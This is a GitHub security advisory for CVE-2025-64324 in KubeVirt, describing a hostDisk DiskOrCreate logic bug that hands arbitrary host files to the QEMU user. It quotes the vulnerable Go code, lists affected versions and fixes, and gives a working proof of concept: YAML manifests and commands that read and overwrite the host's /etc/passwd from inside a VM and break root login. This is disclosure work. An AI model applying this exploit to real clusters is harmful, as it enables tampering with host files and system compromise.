GHSA-46XP-26XH-HPQH
Vulnerability from github – Published: 2025-11-07 18:46 – Updated: 2025-11-27 08:53Summary
The hostDisk feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, the implementation of this feature and more specifically the DiskOrCreate option which creates a file if it doesn't exist, has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system.
Details
The hostDisk feature gate in KubeVirt allows mounting a QEMU RAW image directly from the host into a VM. While similar features, such as mounting disk images from a PVC, enforce ownership-based restrictions (e.g., only allowing files owned by specific UID, this mechanism can be subverted. For a RAW disk image to be readable by the QEMU process running within the virt-launcher pod, it must be owned by a user with UID 107. If this ownership check is considered a security barrier, it can be bypassed. In addition, the ownership of the host files mounted via this feature is changed to the user with UID 107.
The above is due to a logic bug in the code of the virt-handler component which prepares and sets the permissions of the volumes and data inside which are going to be mounted in the virt-launcher pod and consecutively consumed by the VM. It is triggered when one tries to mount a host file or directory using the DiskOrCreate option. The relevant code is as follows:
// pkg/host-disk/host-disk.go
func (hdc DiskImgCreator) Create(vmi *v1.VirtualMachineInstance) error {
for _, volume := range vmi.Spec.Volumes {
if hostDisk := volume.VolumeSource.HostDisk; shouldMountHostDisk(hostDisk) {
if err := hdc.mountHostDiskAndSetOwnership(vmi, volume.Name, hostDisk); err != nil {
return err
}
}
}
return nil
}
func shouldMountHostDisk(hostDisk *v1.HostDisk) bool {
return hostDisk != nil && hostDisk.Type == v1.HostDiskExistsOrCreate && hostDisk.Path != ""
}
func (hdc *DiskImgCreator) mountHostDiskAndSetOwnership(vmi *v1.VirtualMachineInstance, volumeName string, hostDisk *v1.HostDisk) error {
diskPath := GetMountedHostDiskPathFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName, hostDisk.Path)
diskDir := GetMountedHostDiskDirFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName)
fileExists, err := ephemeraldiskutils.FileExists(diskPath)
if err != nil {
return err
}
if !fileExists {
if err := hdc.handleRequestedSizeAndCreateSparseRaw(vmi, diskDir, diskPath, hostDisk); err != nil {
return err
}
}
// Change file ownership to the qemu user.
if err := ephemeraldiskutils.DefaultOwnershipManager.UnsafeSetFileOwnership(diskPath); err != nil {
log.Log.Reason(err).Errorf("Couldn't set Ownership on %s: %v", diskPath, err)
return err
}
return nil
}
The root cause lies in the fact that if the specified by the user file does not exist, it is created by the handleRequestedSizeAndCreateSparseRaw function. However, this function does not explicitly set file ownership or permissions. As a result, the logic in mountHostDiskAndSetOwnership proceeds to the branch marked with // Change file ownership to the qemu user, assuming ownership should be applied. This logic fails to account for the scenario where the file already exists and may be owned by a more privileged user.
In such cases, changing file ownership without validating the file's origin introduces a security risk: it can unintentionally grant access to sensitive host files, compromising their integrity and confidentiality. This may also enable an External API Attacker to disrupt system availability.
PoC
To demonstrate this vulnerability, the hostDisk feature gate should be enabled when deploying the KubeVirt stack.
# kubevirt-cr.yaml
apiVersion: kubevirt.io/v1
kind: KubeVirt
metadata:
name: kubevirt
namespace: kubevirt
spec:
certificateRotateStrategy: {}
configuration:
developerConfiguration:
featureGates:
- HostDisk
customizeComponents: {}
imagePullPolicy: IfNotPresent
workloadUpdateStrategy: {}
Initially, if one tries to create a VM and mount /etc/passwd from the host using the Disk option which assumes that the file already exists, the following error is returned:
# arbitrary-host-read-write.yaml
apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
name: arbitrary-host-read-write
spec:
runStrategy: Always
template:
metadata:
labels:
kubevirt.io/size: small
kubevirt.io/domain: arbitrary-host-read-write
spec:
domain:
devices:
disks:
- name: containerdisk
disk:
bus: virtio
- name: cloudinitdisk
disk:
bus: virtio
- name: host-disk
disk:
bus: virtio
interfaces:
- name: default
masquerade: {}
resources:
requests:
memory: 64M
networks:
- name: default
pod: {}
volumes:
- name: containerdisk
containerDisk:
image: quay.io/kubevirt/cirros-container-disk-demo
- name: cloudinitdisk
cloudInitNoCloud:
userDataBase64: SGkuXG4=
- name: host-disk
hostDisk:
path: /etc/passwd
type: Disk
# Deploy the above VM manifest
operator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml
# Observe the deployment status
operator@minikube:~$ kubectl get vm
NAME AGE STATUS READY
arbitrary-host-read-write 7m55s CrashLoopBackOff False
# Inspect the reason for the `CrashLoopBackOff`
operator@minikube:~$ kubectl get vm arbitrary-host-read-write -o jsonpath='{.status.conditions[3].message}'
server error. command SyncVMI failed: "LibvirtError(Code=1, Domain=10, Message='internal error: process exited while connecting to monitor: 2025-05-20T20:14:01.546609Z qemu-kvm: -blockdev {\"driver\":\"file\",\"filename\":\"/var/run/kubevirt-private/vmi-disks/host-disk/passwd\",\"aio\":\"native\",\"node-name\":\"libvirt-1-storage\",\"read-only\":false,\"discard\":\"unmap\",\"cache\":{\"direct\":true,\"no-flush\":false}}: Could not open '/var/run/kubevirt-private/vmi-disks/host-disk/passwd': Permission denied')"
The hosts's /etc/passwd file's owner and group are 0:0 (root:root) hence, when one tries to deploy the above VirtualMachine definition, it gets a PermissionDenied error because the file is not owned by the user with UID 107 (qemu):
# Inspect the ownership of the host's mounted `/etc/passwd` file within the `virt-launcher` pod responsible for the VM
operator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-host-read-write-tjjkt -- ls -al /var/run/kubevirt-private/vmi-disks/host-disk/passwd
-rw-r--r--. 1 root root 1276 Jan 13 17:10 /var/run/kubevirt-private/vmi-disks/host-disk/passwd
However, if one uses the DiskOrCreate option, the file's ownership is silently changed to 107:107 (qemu:qemu) before the VM is started which allows the latter to boot, and then read and modify it.
...
hostDisk:
capacity: 1Gi
path: /etc/passwd
type: DiskOrCreate
# Apply the modified manifest
operator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml
# Observe the deployment status
operator@minikube::~$ kubectl get vm
NAME AGE STATUS READY
arbitrary-host-read-write 7m55s Running False
# Initiate a console connection to the running VM
operator@minikube: virtctl console arbitrary-host-read-write
...
# Within the VM arbitrary-host-read-write, inspect the present block devices and their contents
root@arbitrary-host-read-write:~$ lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
vda 253:0 0 44M 0 disk
|-vda1 253:1 0 35M 0 part /
`-vda15 253:15 0 8M 0 part
vdb 253:16 0 1M 0 disk
vdc 253:32 0 1.5K 0 disk
root@arbitrary-host-read-write:~$ cat /dev/vdc
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
# Write into the block device backed up by the host's `/etc/passwd` file
root@arbitrary-host-read-write:~$ echo "Quarkslab" | tee -a /dev/vdc
If one inspects the file content of the host's /etc/passwd file, they will see that it has changed alongside its ownership:
# Inspect the contents of the file
operator@minikube:~$ cat /etc/passwd
Quarkslab
:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin
systemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
docker:x:1000:999:,,,:/home/docker:/bin/bash
# Inspect the permissions of the file
operator@minikube:~$ ls -al /etc/passwd
-rw-r--r--. 1 107 systemd-resolve 1276 May 20 20:35 /etc/passwd
# Test the integrity of the system
operator@minikube: $sudo su
sudo: unknown user root
sudo: error initializing audit plugin sudoers_audit
Impact
Host files arbitrary read and write - this vulnerability it can unintentionally grant access to sensitive host files, compromising their integrity and confidentiality.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "kubevirt.io/kubevirt"
},
"ranges": [
{
"events": [
{
"introduced": "1.7.0-alpha.0"
},
{
"fixed": "1.7.0-rc.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-64324"
],
"database_specific": {
"cwe_ids": [
"CWE-123",
"CWE-200",
"CWE-732"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-07T18:46:09Z",
"nvd_published_at": "2025-11-18T23:15:55Z",
"severity": "HIGH"
},
"details": "### Summary\nThe `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, the implementation of this feature and more specifically the `DiskOrCreate` option which creates a file if it doesn\u0027t exist, has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system.\n\n\n### Details\nThe `hostDisk` feature gate in KubeVirt allows mounting a QEMU RAW image directly from the host into a VM. While similar features, such as mounting disk images from a PVC, enforce ownership-based restrictions (e.g., only allowing files owned by specific UID, this mechanism can be subverted. For a RAW disk image to be readable by the QEMU process running within the `virt-launcher` pod, it must be owned by a user with UID 107. **If this ownership check is considered a security barrier, it can be bypassed**. In addition, the ownership of the host files mounted via this feature is changed to the user with UID 107. \n\nThe above is due to a logic bug in the code of the `virt-handler` component which prepares and sets the permissions of the volumes and data inside which are going to be mounted in the `virt-launcher` pod and consecutively consumed by the VM. It is triggered when one tries to mount a host file or directory using the `DiskOrCreate` option. The relevant code is as follows:\n\n```go\n// pkg/host-disk/host-disk.go\n\nfunc (hdc DiskImgCreator) Create(vmi *v1.VirtualMachineInstance) error {\n\tfor _, volume := range vmi.Spec.Volumes {\n\t\tif hostDisk := volume.VolumeSource.HostDisk; shouldMountHostDisk(hostDisk) {\n\t\t\tif err := hdc.mountHostDiskAndSetOwnership(vmi, volume.Name, hostDisk); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}\n\nfunc shouldMountHostDisk(hostDisk *v1.HostDisk) bool {\n\treturn hostDisk != nil \u0026\u0026 hostDisk.Type == v1.HostDiskExistsOrCreate \u0026\u0026 hostDisk.Path != \"\"\n}\n\nfunc (hdc *DiskImgCreator) mountHostDiskAndSetOwnership(vmi *v1.VirtualMachineInstance, volumeName string, hostDisk *v1.HostDisk) error {\n\tdiskPath := GetMountedHostDiskPathFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName, hostDisk.Path)\n\tdiskDir := GetMountedHostDiskDirFromHandler(unsafepath.UnsafeAbsolute(hdc.mountRoot.Raw()), volumeName)\n\tfileExists, err := ephemeraldiskutils.FileExists(diskPath)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif !fileExists {\n\t\tif err := hdc.handleRequestedSizeAndCreateSparseRaw(vmi, diskDir, diskPath, hostDisk); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\t// Change file ownership to the qemu user.\n\tif err := ephemeraldiskutils.DefaultOwnershipManager.UnsafeSetFileOwnership(diskPath); err != nil {\n\t\tlog.Log.Reason(err).Errorf(\"Couldn\u0027t set Ownership on %s: %v\", diskPath, err)\n\t\treturn err\n\t}\n\treturn nil\n}\n```\n\n\nThe root cause lies in the fact that if the specified by the user file does not exist, it is created by the `handleRequestedSizeAndCreateSparseRaw` function. However, this function does not explicitly set file ownership or permissions. As a result, the logic in `mountHostDiskAndSetOwnership` proceeds to the branch marked with `// Change file ownership to the qemu user`, assuming ownership should be applied. This logic fails to account for the scenario where the file already exists and may be owned by a more privileged user. \nIn such cases, changing file ownership without validating the file\u0027s origin introduces a security risk: it can unintentionally grant access to sensitive host files, compromising their integrity and confidentiality. This may also enable an **External API Attacker** to disrupt system availability.\n\n\n### PoC\nTo demonstrate this vulnerability, the `hostDisk` feature gate should be enabled when deploying the KubeVirt stack. \n\n```yaml\n# kubevirt-cr.yaml\napiVersion: kubevirt.io/v1\nkind: KubeVirt\nmetadata:\n name: kubevirt\n namespace: kubevirt\nspec:\n certificateRotateStrategy: {}\n configuration:\n developerConfiguration:\n featureGates:\n - HostDisk\n customizeComponents: {}\n imagePullPolicy: IfNotPresent\n workloadUpdateStrategy: {}\n```\n\n\nInitially, if one tries to create a VM and mount `/etc/passwd` from the host using the `Disk` option which assumes that the file already exists, the following error is returned:\n\n```yaml\n# arbitrary-host-read-write.yaml\napiVersion: kubevirt.io/v1\nkind: VirtualMachine\nmetadata:\n name: arbitrary-host-read-write\nspec:\n runStrategy: Always\n template:\n metadata:\n labels:\n kubevirt.io/size: small\n kubevirt.io/domain: arbitrary-host-read-write\n spec:\n domain:\n devices:\n disks:\n - name: containerdisk\n disk:\n bus: virtio\n - name: cloudinitdisk\n disk:\n bus: virtio\n - name: host-disk\n disk:\n bus: virtio\n interfaces:\n - name: default\n masquerade: {}\n resources:\n requests:\n memory: 64M\n networks:\n - name: default\n pod: {}\n volumes:\n - name: containerdisk\n containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo\n - name: cloudinitdisk\n cloudInitNoCloud:\n userDataBase64: SGkuXG4=\n - name: host-disk\n hostDisk:\n path: /etc/passwd\n type: Disk\n```\n\n\n```bash\n# Deploy the above VM manifest\noperator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml\n# Observe the deployment status\noperator@minikube:~$ kubectl get vm\nNAME AGE STATUS READY\narbitrary-host-read-write 7m55s CrashLoopBackOff False\n# Inspect the reason for the `CrashLoopBackOff`\noperator@minikube:~$ kubectl get vm arbitrary-host-read-write -o jsonpath=\u0027{.status.conditions[3].message}\u0027\nserver error. command SyncVMI failed: \"LibvirtError(Code=1, Domain=10, Message=\u0027internal error: process exited while connecting to monitor: 2025-05-20T20:14:01.546609Z qemu-kvm: -blockdev {\\\"driver\\\":\\\"file\\\",\\\"filename\\\":\\\"/var/run/kubevirt-private/vmi-disks/host-disk/passwd\\\",\\\"aio\\\":\\\"native\\\",\\\"node-name\\\":\\\"libvirt-1-storage\\\",\\\"read-only\\\":false,\\\"discard\\\":\\\"unmap\\\",\\\"cache\\\":{\\\"direct\\\":true,\\\"no-flush\\\":false}}: Could not open \u0027/var/run/kubevirt-private/vmi-disks/host-disk/passwd\u0027: Permission denied\u0027)\"\n```\n\nThe hosts\u0027s `/etc/passwd` file\u0027s owner and group are `0:0` (`root:root`) hence, when one tries to deploy the above `VirtualMachine` definition, it gets a `PermissionDenied` error because the file is not owned by the user with UID `107` (`qemu`):\n\n\n```bash\n# Inspect the ownership of the host\u0027s mounted `/etc/passwd` file within the `virt-launcher` pod responsible for the VM\noperator@minikube:~$ kubectl exec -it virt-launcher-arbitrary-host-read-write-tjjkt -- ls -al /var/run/kubevirt-private/vmi-disks/host-disk/passwd\n-rw-r--r--. 1 root root 1276 Jan 13 17:10 /var/run/kubevirt-private/vmi-disks/host-disk/passwd\n```\n\nHowever, if one uses the `DiskOrCreate` option, the file\u0027s ownership is silently changed to `107:107` (`qemu:qemu`) before the VM is started which allows the latter to boot, and then read and modify it.\n\n```yaml\n...\nhostDisk:\n capacity: 1Gi\n path: /etc/passwd\n type: DiskOrCreate\n```\n\n```bash\n# Apply the modified manifest\noperator@minikube:~$ kubectl apply -f arbitrary-host-read-write.yaml\n# Observe the deployment status\noperator@minikube::~$ kubectl get vm\nNAME AGE STATUS READY\narbitrary-host-read-write 7m55s Running False\n# Initiate a console connection to the running VM\noperator@minikube: virtctl console arbitrary-host-read-write\n...\n```\n\n```bash\n# Within the VM arbitrary-host-read-write, inspect the present block devices and their contents\nroot@arbitrary-host-read-write:~$ lsblk\nNAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT\nvda 253:0 0 44M 0 disk\n|-vda1 253:1 0 35M 0 part /\n`-vda15 253:15 0 8M 0 part\nvdb 253:16 0 1M 0 disk\nvdc 253:32 0 1.5K 0 disk\nroot@arbitrary-host-read-write:~$ cat /dev/vdc\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin\nsystemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nstatd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin\nsshd:x:105:65534::/run/sshd:/usr/sbin/nologin\ndocker:x:1000:999:,,,:/home/docker:/bin/bash\n# Write into the block device backed up by the host\u0027s `/etc/passwd` file\nroot@arbitrary-host-read-write:~$ echo \"Quarkslab\" | tee -a /dev/vdc\n```\n\nIf one inspects the file content of the host\u0027s `/etc/passwd` file, they will see that it has changed alongside its ownership:\n\n```bash\n# Inspect the contents of the file\noperator@minikube:~$ cat /etc/passwd\nQuarkslab\n:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin\nsystemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nstatd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin\nsshd:x:105:65534::/run/sshd:/usr/sbin/nologin\ndocker:x:1000:999:,,,:/home/docker:/bin/bash\n# Inspect the permissions of the file\noperator@minikube:~$ ls -al /etc/passwd\n-rw-r--r--. 1 107 systemd-resolve 1276 May 20 20:35 /etc/passwd\n# Test the integrity of the system\noperator@minikube: $sudo su\nsudo: unknown user root\nsudo: error initializing audit plugin sudoers_audit\n```\n\n### Impact\n\nHost files arbitrary read and write - this vulnerability it can unintentionally grant access to sensitive host files, compromising their integrity and confidentiality.",
"id": "GHSA-46xp-26xh-hpqh",
"modified": "2025-11-27T08:53:21Z",
"published": "2025-11-07T18:46:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-46xp-26xh-hpqh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64324"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/pull/15037"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/00d03e43e3bf03e563136695a4732b65ed42d764"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/ff3b69b08b6b9c8d08d23735ca8d82455f790a69"
},
{
"type": "PACKAGE",
"url": "https://github.com/kubevirt/kubevirt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "KubeVirt Vulnerable to Arbitrary Host File Read and Write"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.